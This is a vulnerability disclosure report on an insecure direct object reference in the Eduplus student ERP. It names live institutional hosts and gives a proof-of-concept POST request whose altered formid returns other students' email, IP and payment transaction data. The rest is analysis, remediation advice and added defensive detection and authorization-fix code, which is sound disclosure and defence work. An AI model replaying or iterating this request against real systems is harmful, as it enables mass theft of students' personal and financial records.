## https://sploitus.com/exploit?id=F66D24A3-EA54-50B6-9F6F-DD3564FAA827
# Vulnerability Research Report: All Eduplus ERP Insecure Direct Object Reference (IDOR)
Researcher: Vinay Sharma
## 1. Executive Summary
This report details a high-severity security vulnerability identified in the Eduplus Student ERP platform, specifically within the student learner portal (`learnerapi.pceterp.in`). The application suffers from a **Universal Insecure Direct Object Reference (IDOR)** on the exam form submission endpoint, allowing any authenticated user (student) to retrieve the sensitive personal and financial data of any other student by manipulating form identifiers.
This vulnerability allows for large-scale data harvesting of student records, including Personally Identifiable Information (PII) and detailed financial transaction audit trails.
---
## 2. Vulnerability Details
- **Target Host:** `learnerapi.pceterp.in`, `learner.zealerp.in`, `learner.despu.edu.in`, etc.
- **Affected Endpoint:** `POST /ExamForm/viewSubmitExamForm`
- **Vulnerability Types:**
- Insecure Direct Object Reference (IDOR) [CWE-639]
- Weak Cryptography (AES-ECB with Hardcoded Key) [CWE-327, CWE-798]
- Sensitive Data Exposure [CWE-312]
- **Severity:** High (Estimated CVSS v3.1: 7.5 - `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N`)
---
## 3. Technical Analysis
### 3.1 Insecure Direct Object Reference (IDOR)
The vulnerability resides in the `viewSubmitExamForm` endpoint. The server relies on two client-supplied parameters to identify the record to be retrieved:
1. **Request Body:** `{"formid": "XXXXX"}`
2. **HTTP Header:** `Router-Path: /view-pcu-exam-form/XXXXX`
While the user must be authenticated, the server fails to verify if the authenticated student is authorized to view the data associated with the requested `formid`. By iterating through numerical IDs, an attacker can access the records of other students.
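The enumeration pattern described above (one authenticated session requesting many different `formid` values in quick succession) is also what a defender can look for in the API access logs. The following is an added detection example, not code from the report or the vendor; the JSON log format, the `learner_id` field, the threshold values and the sample lines are all constructed assumptions for this illustration.

```python
# Added example (not from the report or the ERP vendor): flag sessions that
# request an unusually large number of distinct formid values on the
# viewSubmitExamForm endpoint. Log format, field names, thresholds and the
# sample lines below are constructed assumptions.
import json
from collections import defaultdict

# Constructed access-log lines, one JSON object per request.
SAMPLE_LOG = """
{"ts": 1700000000, "learner_id": 12345, "path": "/ExamForm/viewSubmitExamForm", "formid": "28984"}
{"ts": 1700000001, "learner_id": 12345, "path": "/ExamForm/viewSubmitExamForm", "formid": "28984"}
{"ts": 1700000002, "learner_id": 67890, "path": "/ExamForm/viewSubmitExamForm", "formid": "28985"}
{"ts": 1700000003, "learner_id": 67890, "path": "/ExamForm/viewSubmitExamForm", "formid": "28986"}
{"ts": 1700000004, "learner_id": 67890, "path": "/ExamForm/viewSubmitExamForm", "formid": "28987"}
{"ts": 1700000005, "learner_id": 67890, "path": "/ExamForm/viewSubmitExamForm", "formid": "28988"}
{"ts": 1700000006, "learner_id": 67890, "path": "/ExamForm/viewSubmitExamForm", "formid": "28989"}
{"ts": 1700000300, "learner_id": 67890, "path": "/Profile/view", "formid": null}
"""

WATCHED_PATH = "/ExamForm/viewSubmitExamForm"


def find_enumerators(log_text, window_seconds=60, max_distinct_ids=3):
    """Return {learner_id: set_of_formids} for every learner that requested
    more than max_distinct_ids distinct formid values inside any window of
    window_seconds. A legitimate student only touches their own few forms,
    so a burst of distinct ids from one session is the IDOR-harvesting signal."""
    per_learner = defaultdict(list)  # learner_id -> [(ts, formid), ...]
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        if rec["path"] != WATCHED_PATH or rec.get("formid") is None:
            continue
        per_learner[rec["learner_id"]].append((rec["ts"], rec["formid"]))

    flagged = {}
    for learner, events in per_learner.items():
        events.sort()  # sliding window needs chronological order
        lo = 0
        for hi in range(len(events)):
            # Shrink the window from the left until it spans <= window_seconds.
            while events[hi][0] - events[lo][0] > window_seconds:
                lo += 1
            ids = {fid for _, fid in events[lo:hi + 1]}
            if len(ids) > max_distinct_ids:
                flagged[learner] = ids  # keep the widest set seen for this learner
    return flagged


if __name__ == "__main__":
    for learner, ids in find_enumerators(SAMPLE_LOG).items():
        print(f"learner {learner} requested {len(ids)} distinct formids: {sorted(ids)}")
```

Repeated requests for the same `formid` (learner 12345 above) are not flagged, because the count is over distinct ids; the threshold should be tuned to the number of exam forms a single student legitimately owns on the platform.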
---
## 4. Proof of Concept (PoC)
### 4.1 IDOR Exploitation
A standard POST request to the vulnerable endpoint with a modified `formid` yields sensitive student data.
**Request:**
```http
POST /ExamForm/viewSubmitExamForm HTTP/2
Host: learnerapi.pceterp.in
Content-Type: application/json
Router-Path: /view-pcu-exam-form/28984
... (Authenticated Headers) ...

{"formid":"28984"}
```
**Response (Summary of Leaked Data):**
```json
{
  "status": "200",
  "examFormname": "B.Tech - Sem VI - Regular",
  "receipt_no": "REC/2023/54321",
  "feespaiddate": "2023-10-15",
  "ispaymentdone": {
    "username": "student_example@email.com",
    "received_amount": "1500.0",
    "updation_ip_address": "103.x.x.x",
    "erp_transaction_id": "ERP_998877",
    "bank_transaction_id": "BANK_ABC123",
    "paymentgateway_transaction_id": "PG_XYZ789",
    "learner": {
      "id": "12345"
    }
  }
}
```
---
## 5. Impact Assessment
The successful exploitation of this vulnerability allows for:
- **Mass Exposure of PII:** Access to names, email addresses, student IDs, and login IP addresses of the entire student body.
- **Financial Data Breach:** Exposure of transaction history, bank IDs, and payment gateway references. This information is highly sensitive and could be used for financial social engineering or fraud.
- **Academic Privacy Violation:** Unauthorized access to exam forms, mentor assignments, and submission statuses.
---
## 6. Remediation Recommendations
### 6.1 Authorization Fix (Priority: High)
- Implement **Server-Side Authorization Checks:** The backend must verify that the `formid` requested belongs to the `learnerid` associated with the active session. Never trust the `formid` or `Router-Path` parameters without validation against the authenticated session token.
### 6.3 General Hardening
- **Minimize Data Output:** Ensure the API only returns the fields necessary for the specific UI view. Internal transaction IDs and IP addresses should be redacted unless absolutely required for the user's workflow.
- **Session Security:** Review the use of custom encrypted headers for session management and consider using standard, hardened JWTs or secure HTTP-only cookies.
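The authorization fix in 6.1 and the data-minimisation point in 6.3 can be shown side by side in one handler. The following is an added example and not the vendor's code: the `ExamForm` record, the in-memory `FORMS` table, the function names and the sample values are all constructed assumptions. The vulnerable variant reproduces the pattern from section 3.1 (select by client-supplied `formid`, serialise every column); the fixed variant scopes the lookup to the session's learner id and returns only the fields the view needs.

```python
# Added example (not Eduplus/vendor code): object-level authorization plus
# response minimisation for a "view exam form" lookup. ExamForm, FORMS,
# AuthzError and the sample rows are constructed assumptions.
from dataclasses import dataclass
from typing import Optional


class AuthzError(Exception):
    """Raised when the record does not belong to the authenticated learner."""


@dataclass(frozen=True)
class ExamForm:
    form_id: int
    learner_id: int            # owner of the record
    exam_form_name: str
    receipt_no: str
    received_amount: str
    updation_ip_address: str   # internal audit column, never sent to clients
    bank_transaction_id: str   # internal audit column, never sent to clients


# Constructed rows standing in for the ERP's exam-form table.
FORMS = {
    28984: ExamForm(28984, 12345, "B.Tech - Sem VI - Regular", "REC/2023/54321",
                    "1500.0", "203.0.113.7", "BANK_ABC123"),
    28985: ExamForm(28985, 67890, "B.Tech - Sem VI - Regular", "REC/2023/54322",
                    "1500.0", "203.0.113.9", "BANK_DEF456"),
}


def view_exam_form_vulnerable(form_id: int) -> Optional[dict]:
    """The pattern from section 3.1: the row is chosen purely by the
    client-supplied formid and every stored column is serialised back."""
    form = FORMS.get(form_id)
    return None if form is None else vars(form).copy()


def view_exam_form_fixed(session_learner_id: int, form_id: int) -> dict:
    """Sections 6.1 and 6.3: the lookup is bound to the learner id taken from
    the server-side session (never from formid or Router-Path), and only the
    fields the UI needs are returned. In SQL this is the difference between
    `WHERE formid = ?` and `WHERE formid = ? AND learnerid = ?`."""
    form = FORMS.get(form_id)
    # A missing row and another learner's row get the same answer, so the
    # endpoint cannot be used to confirm which formid values exist.
    if form is None or form.learner_id != session_learner_id:
        raise AuthzError("exam form not found for this learner")
    return {
        "examFormname": form.exam_form_name,
        "receipt_no": form.receipt_no,
        "received_amount": form.received_amount,
    }


if __name__ == "__main__":
    print(view_exam_form_fixed(12345, 28984))
    try:
        view_exam_form_fixed(12345, 28985)
    except AuthzError as exc:
        print("denied:", exc)
```

The ownership predicate belongs inside the data-access query rather than in a separate check after the fetch, so that a future endpoint reusing the repository method cannot forget it.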